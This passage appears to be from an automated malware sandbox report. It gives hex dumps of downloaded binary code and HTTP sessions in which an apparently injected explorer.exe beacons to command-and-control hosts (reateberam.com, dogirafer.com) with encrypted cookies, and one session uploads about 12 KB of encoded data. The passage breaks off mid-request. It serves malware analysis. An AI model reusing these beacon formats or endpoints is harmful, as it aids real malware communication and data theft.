                                                                  2024-12-02 17:45:02 UTC1369INData Raw: 00 00 c7 85 40 06 00 00 61 bc 1d 14 48 89 95 48 06 00 00 c7 85 58 06 00 00 cb a6 9c f4 48 89 95 60 06 00 00 c7 85 70 06 00 00 fd 53 ca 1c 48 89 95 78 06 00 00 c7 85 88 06 00 00 8d bf 40 ab 48 89 95 90 06 00 00 c7 85 a0 06 00 00 02 91 d8 59 48 89 95 a8 06 00 00 48 8d 05 1c 3a 0c 00 c7 85 b8 06 00 00 ce d5 eb c9 48 89 85 b0 06 00 00 48 8d 5c 24 28 48 8d 05 07 3a 0c 00 48 89 95 c0 06 00 00 48 89 85 c8 06 00 00 33 ff 48 8d 05 f8 39 0c 00 c7 85 d0 06 00 00 9f 60 3f 3d 48 89 85 e0 06 00 00 48 8d 05 e8 39 0c 00 48 89 85 f8 06 00 00 48 8d 05 ea 39 0c 00 48 89 85 10 07 00 00 48 8d 05 d4 39 0c 00 48 89 85 28 07 00 00 48 89 95 d8 06 00 00 c7 85 e8 06 00 00 9a f6 2b d8 48 89 95 f0 06 00 00 c7 85 00 07 00 00 48 29 27 75 48 89 95 08 07 00 00 c7 85 18 07 00 00 19 9c f3
                                                                  Data Ascii: @aHHXH`pSHx@HYHH:HH\$(H:HH3H9`?=HH9HH9HH9H(H+HH)'uH
                                                                  2024-12-02 17:45:02 UTC1369INData Raw: 48 85 d2 0f 84 8d 00 00 00 4d 85 c0 0f 84 84 00 00 00 48 8b 41 18 48 39 41 10 72 22 48 03 c0 ba 0f 00 00 00 48 3b c2 48 0f 47 d0 48 81 fa c0 03 00 00 77 62 e8 78 00 00 00 83 f8 ff 74 58 49 83 c8 ff 49 ff c0 42 80 3c 06 00 75 f6 48 8b d6 48 8b cf e8 32 01 00 00 48 85 c0 75 3a 48 8b 6f 10 48 83 ca ff 48 ff c2 80 3c 16 00 75 f7 48 8b ce e8 c4 fe ff ff 48 8b 0f 48 89 04 e9 48 8b 07 48 83 3c e8 00 74 10 48 8b 47 08 4c 89 34 e8 48 ff 47 10 33 c0 eb 03 83 c8 ff 48 8b 6c 24 30 48 8b 74 24 38 48 8b 7c 24 40 48 83 c4 20 41 5e c3 cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 48 83 39 00 48 8b f2 48 8b d9 75 1f 48 83 79 08 00 74 1f 83 c8 ff 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 48 83 79 08 00 74 e1 48 85 f6 74 dc 48 8b ee
                                                                  Data Ascii: HMHAH9Ar"HH;HGHwbxtXIIB<uHH2Hu:HoHH<uHHHHH<tHGL4HG3Hl$0Ht$8H|$@H A^H\$Hl$Ht$WH H9HHuHytH\$0Hl$8Ht$@H _HytHtH
                                                                  2024-12-02 17:45:02 UTC1369INData Raw: 8b c8 48 89 01 eb 1a 84 d2 74 23 80 fa 5c 75 0b 48 ff c0 48 89 01 80 38 00 74 13 48 ff 01 48 8b 01 8a 10 80 fa 22 75 df 48 ff c0 48 89 01 48 8b 11 80 3a 00 75 03 33 c0 c3 49 2b d0 49 8b c9 48 83 ea 02 e9 3c fd ff ff 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b f2 48 8b f9 48 83 fa 13 76 07 33 c0 e9 6c 01 00 00 48 8b 01 0f be 08 e8 4b 8e 08 00 33 db eb 0e 48 ff 07 48 8b 07 0f be 08 e8 39 8e 08 00 85 c0 75 ee 48 8b 17 80 3a 22 0f 84 06 01 00 00 80 3a 2d 0f 84 f3 00 00 00 80 3a 2f 7e be 80 3a 39 0f 8e e5 00 00 00 80 3a 5b 0f 84 ce 00 00 00 80 3a 66 74 5a 80 3a 6e 74 1b 80 3a 74 74 50 80 3a 7b 75 98 48 8d 56 01 48 8b cf e8 11 01 00 00 e9 fa 00 00 00 41 b8 04 00 00 00 48 8d 0d 1f 0f 0b 00 e8 da 8e 08 00 85 c0 0f 85 dd 00 00 00 48 83 07 04 8d 48 10 e8 3e
                                                                  Data Ascii: Ht#\uHH8tHH"uHHH:u3I+IH<H\$Ht$WH HHHv3lHK3HH9uH:":-:/~:9:[:ftZ:nt:ttP:{uHVHAHHH>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.549962172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:06 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hidViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:07 UTC786INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4WlZXslAAr8Y%2B0Efi8RZ9XIxcMHvm44CFLwcimOHeVTmWTdORONC3tOSsO60UH9j7tck7Wn0f3KBZav2KGQluszd2dhr4l0Zqqjg4hRSEuvPYlP1UItnAH4tORh7poWWGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd20f84d254322-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2236&min_rtt=2229&rtt_var=850&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=1277340&cwnd=221&unsent_bytes=0&cid=1f183507da8aab0e&ts=743&x=0"
                                                                  2024-12-02 17:45:07 UTC343INData Raw: 31 35 30 0d 0a 4f 79 53 5a 52 63 71 78 33 59 70 6e 5a 52 33 65 68 57 65 73 7a 6e 35 4e 50 6b 76 57 42 55 36 76 61 2f 61 78 75 69 44 4f 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 35 73 4a 55 38 75 65 70 4f 4f 67 6c 63 6c 44 4c 47 32 74 65 30 4e 74 4a 4f 6f 72 4d 77 2f 67 69 52 57 48 57 42 50 37 73 76 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 73 73 77 42 2b 72 6c 49 6e 4d 59 61 4c 54 48 63 6e 63 6c 71 34 56 46 37 31 48 59 44 68 6b 70 67 55 6b 34 4e 31 4d 4c 4f 63 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 4e 53 54 35
                                                                  Data Ascii: 150OySZRcqx3YpnZR3ehWeszn5NPkvWBU6va/axuiDOKRib7xuPoA21j4bUiz5sJU8uepOOglclDLG2te0NtJOorMw/giRWHWBP7svsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4EsswB+rlInMYaLTHcnclq4VF71HYDhkpgUk4N1MLOcC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfNST5
                                                                  2024-12-02 17:45:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.549972104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:09 UTC410OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hjdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:12 UTC782INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jRkskUANNafWbJKgWYT1eNuqX68738gDGp%2BOekoHyWDWZ2mOc6Oizp9R88sXj%2Fprn0y6jHzxAcftzRSkQ0p91LS1ZiMBVcAfmgKNXghKidxVR1Vh4OSqGjgdGGrlmGob"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd210d9cdaab57-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13829&min_rtt=13823&rtt_var=5196&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=210450&cwnd=32&unsent_bytes=0&cid=82b6558e3c8da119&ts=2556&x=0"
                                                                  2024-12-02 17:45:12 UTC343INData Raw: 31 35 30 0d 0a 4f 79 2b 61 51 63 47 33 33 34 70 67 61 78 76 51 67 47 54 6f 67 33 39 4a 4f 55 4c 66 42 43 4c 43 5a 76 65 37 75 43 54 50 59 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 71 4c 6b 63 73 66 35 54 6e 37 46 6b 68 43 62 4f 39 75 61 42 47 74 35 47 70 6f 38 73 38 36 6b 35 56 47 47 4e 46 37 38 61 6f 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 45 7a 41 75 6a 6a 4a 42 52 2b 61 62 44 4a 66 48 67 73 35 38 74 45 37 31 50 66 43 52 68 4f 37 45 38 2b 4d 6c 6f 4e 4f 63 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 39 58 51 5a
                                                                  Data Ascii: 150Oy+aQcG334pgaxvQgGTog39JOULfBCLCZve7uCTPY2mcphSGpB6yiJiVjA1qLkcsf5Tn7FkhCbO9uaBGt5Gpo8s86k5VGGNF78aofW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcEzAujjJBR+abDJfHgs58tE71PfCRhO7E8+MloNOcC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBf9XQZ
                                                                  2024-12-02 17:45:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.549980104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:13 UTC410OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hgdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:15 UTC791INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:15 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RlfWRwafuS7SV2OwM1%2FwBLSRv8BNupIrulJI3Xfg%2BfaK%2BBD9O9U2YwMPJbJllw6%2Bhu%2FzsNTRnUmep1xNQrZxuKk%2FTQUZSAznwzByAxJ6MO%2FC4plfARGAq2AcW0RtrxO5"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd212669620f7c-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1521&min_rtt=1516&rtt_var=579&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1872995&cwnd=226&unsent_bytes=0&cid=80ff5981ca59dd9e&ts=1637&x=0"
                                                                  2024-12-02 17:45:15 UTC343INData Raw: 31 35 30 0d 0a 4f 79 71 5a 54 63 65 77 32 6f 70 6c 5a 42 76 63 6a 47 62 6e 67 33 52 4c 4f 45 50 66 42 53 44 43 5a 76 69 32 76 53 66 4a 5a 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 70 49 45 38 69 66 5a 76 6d 37 46 59 6b 44 37 47 39 73 36 46 47 74 4a 65 76 72 4d 6b 37 35 45 35 64 47 47 5a 4b 37 73 71 68 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 73 32 42 2b 72 6e 4a 52 56 2b 62 72 58 49 66 48 4d 71 34 63 74 41 36 46 54 55 43 52 31 4f 37 45 77 36 4d 56 67 4c 4f 6f 72 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 56 52 70
                                                                  Data Ascii: 150OyqZTcew2oplZBvcjGbng3RLOEPfBSDCZvi2vSfJZ2mcphSGpB6yiJiVjA1pIE8ifZvm7FYkD7G9s6FGtJevrMk75E5dGGZK7sqhfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kcs2B+rnJRV+brXIfHMq4ctA6FTUCR1O7Ew6MVgLOorMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1VRp
                                                                  2024-12-02 17:45:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.549986104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:16 UTC410OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hhdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:18 UTC785INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:18 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rURcdDUxMDsVGcx4MFrURWj55II4ejMEMeGoRSz73%2BdyG%2Fit0RmeJ7xp9lkES%2Bb9m%2FjW6QC8aTAvXHT3GhTQvuaJq6M1Rem7jA9oueB1yjryNsFPqgsMgyEE6romlbK1"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd213b7a4043c3-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1710&rtt_var=646&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1685912&cwnd=211&unsent_bytes=0&cid=d661f53d6cebb1f0&ts=1756&x=0"
                                                                  2024-12-02 17:45:18 UTC343INData Raw: 31 35 30 0d 0a 4f 53 6d 55 52 38 43 37 33 49 70 75 59 52 7a 66 67 47 37 6f 67 33 35 4f 50 6b 33 56 41 6b 36 75 5a 76 32 77 76 43 62 49 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 4a 75 49 30 41 72 65 70 4b 4f 68 56 73 69 43 62 43 33 73 75 30 4f 74 5a 43 6f 70 63 6f 34 67 69 64 52 48 6d 70 4e 37 63 48 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 4d 41 34 44 4f 4c 68 49 58 4d 5a 62 37 54 46 66 6e 41 72 71 34 35 42 36 46 48 63 41 42 67 70 68 6b 45 31 4e 46 6f 4b 4f 73 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 35 62 51 5a
                                                                  Data Ascii: 150OSmUR8C73IpuYRzfgG7og35OPk3VAk6uZv2wvCbIKRib7xuPoA21j4bUizJuI0ArepKOhVsiCbC3su0OtZCopco4gidRHmpN7cHsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4EMA4DOLhIXMZb7TFfnArq45B6FHcABgphkE1NFoKOsC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBf5bQZ
                                                                  2024-12-02 17:45:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.549995104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:20 UTC410OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hudViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:21 UTC787INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:21 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PFgjLGC0TndqGRU9eAEIcG87F4aey85tAAjoHiB2f8%2BcQDQIwlgv3v%2BOmu8S8pxlcbQ6nLTO8%2BG%2FsGTcgDrp5FMwFG9zVtjHMCZNDduaOb2lczkysc%2F7NzD3IEhNU1YA"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd214e1aefc44f-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1501&rtt_var=587&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1828428&cwnd=251&unsent_bytes=0&cid=46daa7eef1c2d574&ts=1618&x=0"
                                                                  2024-12-02 17:45:21 UTC343INData Raw: 31 35 30 0d 0a 50 43 57 62 52 63 53 33 33 59 70 76 59 42 76 63 68 47 44 67 67 33 64 50 4f 45 6a 65 42 43 50 43 62 50 2b 77 75 53 58 4a 62 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 72 4a 45 4d 70 65 4a 62 67 37 46 63 69 41 62 71 39 73 36 42 47 73 70 71 71 72 63 77 39 35 45 35 54 47 6d 4e 4b 37 73 53 68 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 6b 7a 42 2b 72 71 4a 52 68 2b 62 37 54 46 66 58 6b 72 34 38 74 48 37 31 62 66 43 78 42 44 37 45 38 38 4f 56 34 4e 50 59 33 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 58 52 4a
                                                                  Data Ascii: 150PCWbRcS33YpvYBvchGDgg3dPOEjeBCPCbP+wuSXJbWmcphSGpB6yiJiVjA1rJEMpeJbg7FciAbq9s6BGspqqrcw95E5TGmNK7sShfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KckzB+rqJRh+b7TFfXkr48tH71bfCxBD7E88OV4NPY3MfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1XRJ
                                                                  2024-12-02 17:45:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.549999104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:23 UTC414OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hvdViRxTPtzGAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 12232
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:23 UTC12232OUTData Raw: 4c 48 54 64 46 35 33 74 6a 37 77 78 62 6d 69 35 78 51 36 78 71 48 4d 55 61 45 6d 44 54 6c 6a 59 4d 35 2f 4c 79 31 69 4b 4e 33 6a 4c 33 41 33 35 74 79 61 35 68 5a 69 70 34 7a 56 71 57 44 52 39 65 75 69 59 38 43 39 31 61 38 57 32 2b 2f 56 35 77 65 7a 47 77 38 6c 69 6c 46 4a 51 53 78 38 55 6e 6f 62 5a 51 6c 64 48 61 6c 51 2b 53 48 44 4a 35 5a 65 78 46 52 4f 65 7a 52 74 4b 4e 72 51 42 78 71 67 55 38 30 79 2b 32 4e 65 74 41 77 6b 76 6e 45 6d 56 65 48 6d 56 61 72 74 43 5a 62 6d 2b 66 56 68 34 42 4d 33 46 41 77 52 50 6f 74 51 50 6e 44 61 4a 62 33 4d 62 30 69 46 71 5a 69 4a 37 4f 74 76 38 47 65 72 63 61 45 66 45 4c 55 36 77 5a 48 6a 76 54 67 38 66 48 79 76 4c 38 43 70 36 61 72 59 35 6f 4a 53 41 71 34 64 35 49 50 53 69 70 34 75 4a 58 49 59 57 50 2b 53 6e 45 6d 58
                                                                  Data Ascii: LHTdF53tj7wxbmi5xQ6xqHMUaEmDTljYM5/Ly1iKN3jL3A35tya5hZip4zVqWDR9euiY8C91a8W2+/V5wezGw8lilFJQSx8UnobZQldHalQ+SHDJ5ZexFROezRtKNrQBxqgU80y+2NetAwkvnEmVeHmVartCZbm+fVh4BM3FAwRPotQPnDaJb3Mb0iFqZiJ7Otv8GercaEfELU6wZHjvTg8fHyvL8Cp6arY5oJSAq4d5IPSip4uJXIYWP+SnEmX
                                                                  2024-12-02 17:45:24 UTC789INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:24 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uk74ygKa1nEoMgfiXQ%2Fe%2F%2FLgcrVEvS2HBx1ZpfQEkdZnNgOMMBSpwlj69cPiybnSIGCKKCYyIVeZy9hVu2KH1abz5d8TA654mYxow2nD%2FQTrTnbIATpq5uAfmQhUk%2FGH"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd21600ca14309-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1751&min_rtt=1751&rtt_var=657&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2829&recv_bytes=13328&delivery_rate=1667618&cwnd=232&unsent_bytes=0&cid=678d627545184e58&ts=1579&x=0"
                                                                  2024-12-02 17:45:24 UTC580INData Raw: 32 34 38 0d 0a 4f 43 6d 5a 51 73 57 79 32 34 70 6e 61 78 76 59 68 32 65 73 7a 58 39 48 4d 30 7a 58 61 79 61 6b 61 66 79 79 76 43 61 41 57 42 2b 6f 6d 32 4c 39 32 57 2f 54 67 76 50 74 73 54 56 76 4a 30 46 6d 66 4a 50 67 68 31 6f 72 44 39 32 35 74 71 4d 4d 74 5a 4f 6f 36 50 55 45 37 43 42 51 47 57 74 4b 37 4b 79 6f 4e 56 63 51 45 51 70 4a 51 51 75 2f 35 4d 6a 4a 52 57 47 30 74 6d 31 47 5a 4d 70 59 76 36 46 51 76 52 62 73 70 4b 44 4d 41 58 45 4b 39 6b 6a 6f 47 69 48 43 47 34 51 31 42 4f 7a 6a 4b 42 38 56 41 37 50 4a 65 58 6b 74 35 49 59 4b 30 32 6a 5a 43 78 70 4f 69 30 38 2b 58 6c 77 4e 50 6f 57 44 52 4e 65 63 45 54 44 44 66 54 62 74 65 6a 6d 58 4f 77 74 4c 5a 48 58 32 73 32 4d 71 48 2b 68 44 31 70 48 43 72 76 4d 5a 66 35 58 64 38 73 36 76 50 76 46 62 51 35
                                                                  Data Ascii: 248OCmZQsWy24pnaxvYh2eszX9HM0zXayakafyyvCaAWB+om2L92W/TgvPtsTVvJ0FmfJPgh1orD925tqMMtZOo6PUE7CBQGWtK7KyoNVcQEQpJQQu/5MjJRWG0tm1GZMpYv6FQvRbspKDMAXEK9kjoGiHCG4Q1BOzjKB8VA7PJeXkt5IYK02jZCxpOi08+XlwNPoWDRNecETDDfTbtejmXOwtLZHX2s2MqH+hD1pHCrvMZf5Xd8s6vPvFbQ5
                                                                  2024-12-02 17:45:24 UTC11INData Raw: 6d 43 4e 59 46 6b 37 63 3d 0d 0a
                                                                  Data Ascii: mCNYFk7c=
                                                                  2024-12-02 17:45:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.550000104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:45:25 UTC414OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
